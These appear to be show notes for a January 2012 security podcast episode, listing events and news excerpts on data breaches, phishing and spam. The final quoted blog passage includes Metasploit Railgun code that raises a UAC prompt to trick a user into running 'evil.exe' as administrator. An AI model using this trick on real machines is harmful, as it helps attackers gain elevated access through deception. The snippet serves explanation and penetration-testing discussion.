InfoSec Daily Podcast Episode 558 for January 3, 2012. Tonight's podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
Announcements:
Brad Smith (theNurse)
We all know and love Brad Smith, aka theNurse. His humor and smiling positivity is a wonderful example for our community. At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. Please feel free to check in for status or to donate. Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
http://www.social-engineer.org/bradsmithdonation/
CampusCon 2012
When: January 21, 2012
Where: WIT {Waterford Institute of Technology} Sports – Waterford, Ireland
http://campuscon.hackingwit.com
(from Baconzombie)
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
When: Starts January 24, 2012
Where: Atlanta, GA
Discount Code:
http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
When: January 27th-29th, 2012
Where: Washington Hilton Hotel, Washington, DC
http://www.shmoocon.org
Social Engineering Training
When: March 5-9
Where: Seattle, Washington
When: April 9-13
Where: Bristol, UK
http://www.social-engineer.com/social-engineer-training
Linuxfest Northwest 2012
When: Saturday, April 28th-29th, 2012
Where: Bellingham Technical College – Bellingham, WA
http://www.linuxfestnorthwest.org/
CFP now open!
AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center
Huntington, West Virginia
http://aide.marshall.edu
CFP now open!
DerbyCon 2012 – "Dropping the Deuce"
When: September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. If you’re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
Stories
Source: http://www.care2.com/care2blog/to-all-care2-members-security-breach.html
The website of Care2, an organization that’s all about living a healthy, green lifestyle, has been breached in the last days of December by an unknown hacker team that managed to access the login information belonging to a number of the site’s members.
The official statement released by the company claims that only a limited number of Care2 member accounts were accessed by the cybercriminals, but as a precaution measure, all their 17,911,623 account holders are forced to change their passwords on their next log-in.
“We sincerely apologize for this inconvenience. Given our large membership size, we have become a significant target for spammers and hackers over the past few years, and this was the first hacking attempt that successfully breached our protective walls,” Care2 representatives wrote on the site’s blog.
The vulnerabilities which the hackers used to penetrate the site’s defenses were immediately patched up to prevent further access, but the incident is still being investigated to determine the full extent of the breach.
The FBI has been contacted to investigate the matter, but so far, the only clues to point to the identity of the attackers are some IP addresses from Russia. This, however, doesn’t necessarily prove that the attack was launched from there. It could be that the hackers compromised devices from this certain location.
Since no financial information is stored in the site’s databases, the hackers may have targeted Care2 in order to obtain passwords which they can later use to gain access to other accounts, including ones that contain more sensitive data.
This is exactly why customers are advised not only to change their passwords on the breached site, but also on others that share the same credentials. This procedure has to be done in the shortest time since after they get their hands on the loot, the crooks will try to make the best of it before their victims get to do anything about it.
….
Source: http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml
The latest fraudulent emails that target American Airlines customers, but these scams recorded a considerable increase and that’s why I think this is a good opportunity to remind everyone of the plots. Also, we’ll take a look at the company’s official statement on the matter.
After reading the previous article, tens of readers shared the fake emails they received in which they were alerted on the fact that a ticket had been purchased using their credit cards.
The phony emails that bear the subject “Re: Your Flight Order N590” look something like this:
Dear Customer,
FLIGHT ELECTRONIC NUMBER 8532856
DATE & TIME / NOVEMBER 28, 2011, 11:17 PM
ARRIVING: NEW YORK JFK
TOTAL PRICE : 278.02 USD
Targeted customers report that the name of the destination may vary, Tulsa, Worcester, Oxnard, Stockton, Long Beach, Chicago and Houston being among the names mentioned in the email.
Since they noticed that the number of false notices increased considerably and even moved to target fax machines, the company quickly acted on informing flyers about the malicious plot.
“American Airlines will never ask you to perform security-related changes to your account in this fashion or send emails to collect user names, passwords, email addresses or other personal information,” reads the company’s statement.
“If you receive an email claiming to be from American Airlines, that asks for account information, it should be considered fraudulent and an attempt to obtain personal information that may be used to commit fraud. If you receive a phishing fax, please disregard and destroy the fax.”
Users who come across similar emails or even faxes are advised to immediately delete them to protect themselves from whatever may be hiding behind the attachments or the links that accompany the messages.
In addition, here are certain things that can give away the true identity of such a phony notice:
- phony messages always ask for personal information;
- they address the recipient with generic titles such as “dear customer;”
- they make false threats and claims, alerting users that their accounts will be terminated or their credit cards will be charged;
- in most cases, they are full of typos or poor grammar since a majority are sent by cybercriminals from other countries than the US.
….
Source: http://www.news24.com/SciTech/News/India-becomes-junk-mail-hotspot-20120103
India has emerged as the world's top source of junk mail as spammers make use of lax laws and absent enforcement to turn the country into a centre of unsolicited e-mail.
A recent report by Kaspersky Lab, a Moscow-based global internet security firm, says more spam was sent from the south Asian giant than anywhere else in the world in the third quarter of the year.
An average of 79.8% of e-mail traffic in the three months to the end of September was junk. Of that, 14.8% originated in India, 10.6% came from Indonesia, and 9.7% from Brazil.
Darya Gudkova, a spam analyst at Kaspersky, said the statistics reflect a growing trend for spam to be sent from computers in Asian and Latin America countries.
….
Source: http://www.jpost.com/International/Article.aspx?id=251943&R=R4
The hackers published the list of cards, names and other personal details on the One sports website, which was hacked.
The hackers published a 30 megabyte file containing the details. Israeli credit card companies have urged their customers to remain calm, and said they are taking all the required steps to secure credit accounts.
Visa CAL announced that it would suspend all accounts that were detailed in the post. The company said it would contact the affected customers Tuesday and issue them new credit cards.
The Bank of Israel announced it would review the matter.
According to Army Radio, the hackers encouraged readers to use the information posted online to make purchases, and said they would continue to publish more account information already in their possession.
….
Source: http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter
Trend recently found Twitter spam touting “gift cards” at the tail-end of the gift-giving season. In this run, Twitter users are lured into clicking a shortened URL with the strings “#mcdonalds gift card.” McDonald’s is a globally well-known fast food chain that, like many other establishments, do offer certificates and vouchers for patrons who would like to give these as gifts or rewards.
Unfortunately, closer inspection of the shortened link reveals a URL that doesn’t seem to have anything to do with McDonald’s gift certificates.
Instead, the link leads to the following site:
Clicking the “Join Now” button leads to some redirections that finally lands the page to an adult dating site.
We consider the URLs used in this attack as malicious because of the deceitful nature by which they are used. The lure “#mcdonald’s gift card” would have definitely led several users to believe that some gift certificates or vouchers are being given away or discounted.
A couple of weeks ago of weeks ago in the US, attention was drawn to a Mystery Santa who donated $500 worth of gift cards from McDonald’s to a nearby homeless shelter. Whether or not cybercriminals got a social engineering idea from this cannot be confirmed, but in all cases users are advised against clicking on links without first inspecting them. In this case, hovering on the link would have given users a clue about how to proceed. Another context clue in the illegitimacy of this spam is how users may find themselves being mentioned in the same tweet with unfamiliar users or users that they do not normally follow. This is due to how the spam bot mentions Twitter accounts that have been victimized in the same spammed tweet.
Source: http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html
IF TIME: them mubix blog regarding UAC elevation
http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html
A number of times during tests I've actually run into those mythical creatures called "patched windows machines". At DerbyCon Chris Gates and I released the "Ask" post module (which I had failed to publish). This module very simply uses the ShellExecute windows function via Railgun with the undocumented (but very well known) operator of 'runas'.
client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],])
client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)
This would quite simply prompt the user with that annoying UAC prompt asking the user to run 'evil.exe' with Administrative privs. If they are not "Admins" themselves then it would prompt them for the user name and password.
